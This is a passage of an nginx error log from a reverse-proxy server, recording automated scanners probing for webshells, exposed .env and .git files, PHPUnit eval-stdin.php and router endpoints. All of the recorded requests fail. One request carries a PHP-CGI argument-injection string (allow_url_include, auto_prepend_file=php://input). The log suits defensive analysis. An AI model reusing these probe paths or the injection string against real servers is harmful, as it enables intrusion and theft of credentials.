/wp-includes/widgets/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 open() "/var/www/html/nov.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /nov.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 open() "/var/www/html/xo.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /xo.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 open() "/var/www/html/class111.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /class111.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 open() "/var/www/html/des.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /des.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 open() "/var/www/html/ext.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /ext.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 "/var/www/html/wp-content/cache/index.html" is not found (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-content/cache/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 open() "/var/www/html/doc.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /doc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 "/var/www/html/wp-includes/PHPMailer/index.html" is not found (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/PHPMailer/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 "/var/www/html/wp-includes/blocks/code/index.html" is not found (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/blocks/code/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 "/var/www/html/wp-includes/js/crop/index.html" is not found (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/js/crop/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 open() "/var/www/html/wp-includes/rest-api/about.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/rest-api/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 "/var/www/html/wp-admin/css/colors/blue/index.html" is not found (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/blue/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 open() "/var/www/html/ant.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /ant.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 open() "/var/www/html/gec.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /gec.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 open() "/var/www/html/batmplus.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /batmplus.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 open() "/var/www/html/text.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /text.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 open() "/var/www/html/wp-admin/maint/yes.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/yes.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 "/var/www/html/x/index.html" is not found (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /x/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 open() "/var/www/html/mail.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //mail.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 open() "/var/www/html/wp-admin/includes/class_api.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/includes/class_api.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 "/var/www/html/.well-known/index.html" is not found (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /.well-known/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:36 [error] 220#220: *6027 "/var/www/html/ALFA_DATA/alfacgiapi/index.html" is not found (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /ALFA_DATA/alfacgiapi/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:37 [error] 220#220: *6027 "/var/www/html/wp-admin/network/index.html" is not found (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/network/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:37 [error] 220#220: *6027 "/var/www/html/wp-includes/SimplePie/index.html" is not found (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/SimplePie/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:37 [error] 220#220: *6027 "/var/www/html/wp-content/index.html" is not found (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-content/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:37 [error] 220#220: *6027 "/var/www/html/wp-includes/Requests/Text/index.html" is not found (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/Requests/Text/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:37 [error] 220#220: *6027 "/var/www/html/wp-admin/css/colors/index.html" is not found (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:37 [error] 220#220: *6027 "/var/www/html/wp-content/plugins/wp-help/index.html" is not found (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/wp-help/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:37 [error] 220#220: *6027 "/var/www/html/wp-includes/rest-api/fields/cache/index.html" is not found (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/rest-api/fields/cache/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:37 [error] 220#220: *6027 open() "/var/www/html/priv8.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /priv8.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:37 [error] 220#220: *6027 open() "/var/www/html/wp-admin/xl2023.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/xl2023.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:37 [error] 220#220: *6027 open() "/var/www/html/wp-content/alfa.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-content/alfa.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:37 [error] 220#220: *6027 open() "/var/www/html/dropdown.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET //dropdown.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:02:37 [error] 220#220: *6027 open() "/var/www/html/wp-includes/Text/Diff/Engine/about.php" failed (2: No such file or directory), client: 52.169.206.229, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/Text/Diff/Engine/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 14:22:56 [error] 217#217: *6033 open() "/var/www/html/cgi/conf.bin" failed (2: No such file or directory), client: 194.50.16.253, server: localhost-nginx-proxy-manager, request: "GET /cgi/conf.bin HTTP/1.1", host: "92.249.249.197", referrer: "http://92.249.249.197:80/mainFrame.htm" +2026/01/12 15:11:29 [error] 217#217: *6064 open() "/var/www/html/odinhttpcall1768230689" failed (2: No such file or directory), client: 64.225.101.186, server: localhost-nginx-proxy-manager, request: "GET /odinhttpcall1768230689 HTTP/1.1", host: "92.249.249.197" +2026/01/12 15:11:29 [error] 217#217: *6066 open() "/var/www/html/sdk" failed (2: No such file or directory), client: 64.225.101.186, server: localhost-nginx-proxy-manager, request: "POST /sdk HTTP/1.1", host: "92.249.249.197" +2026/01/12 15:11:29 [error] 217#217: *6067 open() "/var/www/html/HNAP1" failed (2: No such file or directory), client: 64.225.101.186, server: localhost-nginx-proxy-manager, request: "GET /HNAP1 HTTP/1.1", host: "92.249.249.197" +2026/01/12 15:11:29 [error] 218#218: *6068 open() "/var/www/html/evox/about" failed (2: No such file or directory), client: 64.225.101.186, server: localhost-nginx-proxy-manager, request: "GET /evox/about HTTP/1.1", host: "92.249.249.197" +2026/01/12 15:11:29 [error] 218#218: *6072 open() "/var/www/html/query" failed (2: No such file or directory), client: 207.154.204.178, server: localhost-nginx-proxy-manager, request: "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 15:11:29 [error] 218#218: *6073 open() "/var/www/html/solr/admin/info/system" failed (2: No such file or directory), client: 157.230.116.91, server: localhost-nginx-proxy-manager, request: "GET /solr/admin/info/system HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 15:11:29 [error] 218#218: *6074 open() "/var/www/html/cgi-bin/authLogin.cgi" failed (2: No such file or directory), client: 164.90.216.252, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/authLogin.cgi HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 15:11:29 [error] 218#218: *6075 open() "/var/www/html/v2/_catalog" failed (2: No such file or directory), client: 64.226.92.143, server: localhost-nginx-proxy-manager, request: "GET /v2/_catalog HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 15:11:29 [error] 218#218: *6077 open() "/var/www/html/solr/admin/cores" failed (2: No such file or directory), client: 157.230.116.91, server: localhost-nginx-proxy-manager, request: "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 17:57:08 [error] 233#233: *7830 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "92.249.249.197:80", referrer: "http://92.249.249.197:80/home.asp" +2026/01/12 18:44:25 [error] 236#236: *9346 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "92.249.249.197:80", referrer: "http://92.249.249.197:80/home.asp" +2026/01/12 19:54:30 [error] 233#233: *9375 open() "/var/www/html/_next" failed (2: No such file or directory), client: 87.121.84.24, server: localhost-nginx-proxy-manager, request: "POST /_next HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 19:54:35 [error] 233#233: *9376 open() "/var/www/html/api" failed (2: No such file or directory), client: 87.121.84.24, server: localhost-nginx-proxy-manager, request: "POST /api HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 19:54:40 [error] 234#234: *9377 open() "/var/www/html/_next/server" failed (2: No such file or directory), client: 87.121.84.24, server: localhost-nginx-proxy-manager, request: "POST /_next/server HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 19:54:44 [error] 234#234: *9378 open() "/var/www/html/app" failed (2: No such file or directory), client: 87.121.84.24, server: localhost-nginx-proxy-manager, request: "POST /app HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 19:54:48 [error] 234#234: *9379 open() "/var/www/html/api/route" failed (2: No such file or directory), client: 87.121.84.24, server: localhost-nginx-proxy-manager, request: "POST /api/route HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 20:11:43 [error] 234#234: *9385 open() "/var/www/html/_next" failed (2: No such file or directory), client: 176.65.148.161, server: localhost-nginx-proxy-manager, request: "HEAD /_next HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 20:24:55 [error] 234#234: *9390 open() "/var/www/html/telescope/requests" failed (2: No such file or directory), client: 35.216.254.237, server: localhost-nginx-proxy-manager, request: "GET /telescope/requests HTTP/1.1", host: "92.249.249.197" +2026/01/12 20:24:55 [error] 234#234: *9391 open() "/var/www/html/info.php" failed (2: No such file or directory), client: 35.216.254.237, server: localhost-nginx-proxy-manager, request: "GET /info.php HTTP/1.1", host: "92.249.249.197" +2026/01/12 20:24:55 [error] 234#234: *9392 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 35.216.254.237, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "92.249.249.197" +2026/01/12 20:24:55 [error] 234#234: *9393 open() "/var/www/html/server-status" failed (2: No such file or directory), client: 35.216.254.237, server: localhost-nginx-proxy-manager, request: "GET /server-status HTTP/1.1", host: "92.249.249.197" +2026/01/12 20:24:55 [error] 234#234: *9394 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 35.216.254.237, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "92.249.249.197" +2026/01/12 20:24:55 [error] 235#235: *9395 open() "/var/www/html/.env" failed (2: No such file or directory), client: 35.216.254.237, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/12 20:48:21 [error] 235#235: *9402 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 46.161.50.108, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 20:48:21 [error] 235#235: *9404 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 46.161.50.108, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "92.249.249.197:80" +2026/01/12 23:05:14 [error] 241#241: *10930 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.139.104.168, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/12 23:26:03 [error] 241#241: *10935 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 52.180.159.71, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "92.249.249.197" +2026/01/12 23:48:19 [error] 241#241: *10939 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "92.249.249.197", referrer: "http://92.249.249.197/home.asp" +2026/01/13 00:49:54 [error] 242#242: *12445 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "92.249.249.197", referrer: "http://92.249.249.197/home.asp" +2026/01/13 01:12:20 [error] 243#243: *12450 open() "/var/www/html/index.asp" failed (2: No such file or directory), client: 204.76.203.20, server: localhost-nginx-proxy-manager, request: "GET /index.asp HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 01:53:43 [error] 241#241: *12464 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:45 [error] 241#241: *12465 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:45 [error] 241#241: *12466 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:45 [error] 241#241: *12467 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:46 [error] 241#241: *12468 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:46 [error] 241#241: *12469 open() "/var/www/html/demo/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /demo/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:47 [error] 241#241: *12470 open() "/var/www/html/dev/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /dev/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:47 [error] 241#241: *12471 open() "/var/www/html/staging/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /staging/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:47 [error] 241#241: *12472 open() "/var/www/html/mail/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /mail/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:47 [error] 241#241: *12473 open() "/var/www/html/m/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /m/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:48 [error] 241#241: *12474 open() "/var/www/html/remote/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /remote/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:48 [error] 241#241: *12475 open() "/var/www/html/webmail/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /webmail/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:48 [error] 241#241: *12476 open() "/var/www/html/server/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /server/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:49 [error] 241#241: *12477 open() "/var/www/html/vpn/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /vpn/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:49 [error] 240#240: *12478 open() "/var/www/html/secure/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /secure/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:49 [error] 240#240: *12479 open() "/var/www/html/shop/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /shop/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:50 [error] 240#240: *12480 open() "/var/www/html/cloud/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /cloud/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:50 [error] 240#240: *12481 open() "/var/www/html/portal/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /portal/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:50 [error] 240#240: *12482 open() "/var/www/html/host/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /host/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:51 [error] 240#240: *12483 open() "/var/www/html/support/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /support/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:51 [error] 240#240: *12484 open() "/var/www/html/pop/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /pop/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:52 [error] 240#240: *12485 open() "/var/www/html/store/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /store/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:52 [error] 240#240: *12486 open() "/var/www/html/cdn/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /cdn/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:53 [error] 240#240: *12487 open() "/var/www/html/dashboard/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /dashboard/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:53 [error] 240#240: *12488 open() "/var/www/html/test/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /test/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:54 [error] 240#240: *12489 open() "/var/www/html/smtp/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /smtp/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:54 [error] 240#240: *12490 open() "/var/www/html/ftp/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /ftp/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:54 [error] 240#240: *12491 open() "/var/www/html/wiki/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /wiki/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:54 [error] 240#240: *12492 open() "/var/www/html/help/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /help/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 01:53:55 [error] 240#240: *12493 open() "/var/www/html/blog/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /blog/.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 03:15:14 [error] 242#242: *12512 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 03:15:15 [error] 242#242: *12513 open() "/var/www/html/.env.private" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env.private HTTP/1.1", host: "92.249.249.197" +2026/01/13 03:15:15 [error] 242#242: *12514 open() "/var/www/html/.env-ids.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-ids.env HTTP/1.1", host: "92.249.249.197" +2026/01/13 03:15:16 [error] 242#242: *12515 open() "/var/www/html/.env-preview" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env-preview HTTP/1.1", host: "92.249.249.197" +2026/01/13 04:08:08 [error] 240#240: *14030 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 165.227.157.247, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:23:55 [error] 242#242: *14042 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:23:57 [error] 242#242: *14042 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:23:57 [error] 242#242: *14042 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:23:58 [error] 242#242: *14042 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:23:58 [error] 242#242: *14042 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:23:59 [error] 242#242: *14042 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:23:59 [error] 242#242: *14042 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:23:59 [error] 242#242: *14042 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:00 [error] 242#242: *14042 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:01 [error] 242#242: *14042 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:02 [error] 242#242: *14042 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:02 [error] 242#242: *14042 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:03 [error] 242#242: *14042 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:03 [error] 242#242: *14042 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:04 [error] 242#242: *14042 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:05 [error] 242#242: *14042 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:05 [error] 242#242: *14042 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/13 04:24:05 [error] 242#242: *14042 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 42.240.131.227, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: 